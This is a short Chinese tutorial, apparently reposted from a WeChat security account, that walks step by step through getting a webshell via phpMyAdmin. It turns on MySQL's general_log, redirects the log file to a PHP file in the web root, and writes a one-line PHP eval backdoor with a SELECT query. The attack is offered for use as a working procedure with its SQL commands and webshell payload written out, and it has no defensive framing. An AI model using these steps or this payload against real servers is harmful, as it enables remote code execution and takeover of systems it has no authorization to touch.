通过phpmyadmin GETshell

general_log默认为关闭的,root权限开启后,general_log_file会保存所有的查询语句

可以开启general_log,然后设置general_log_file为一个php文件,最后用一句话木马进行查询来获取shell

进入phpmyadmin后在SQL处执行SQL语句

首先查看general log是否开启

show variables like 'general_log';

general log是关闭状态,执行SQL语句开启general log

SET GLOBAL general_log = ON

开启成功

然后把general_log_file设置为shell的绝对路径

SET global general_log_file='D:/wamp/www/orange.php';

看下刚刚创建的orange.php里的内容

然后执行SQL查询语句,写个一句话进去。

SELECT '<?php @eval($_POST["orange"]);?>';

现在再看下orange.php里面的内容

成功插入了一句话木马

一句话链接在根目录(http://127.0.0.1/orange.php)

到此getshell便成功了。

原文发布于微信公众号 - 白安全组(bai-1152770445)

原文发表时间:2019-08-08

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

扫码关注云+社区

领取腾讯云代金券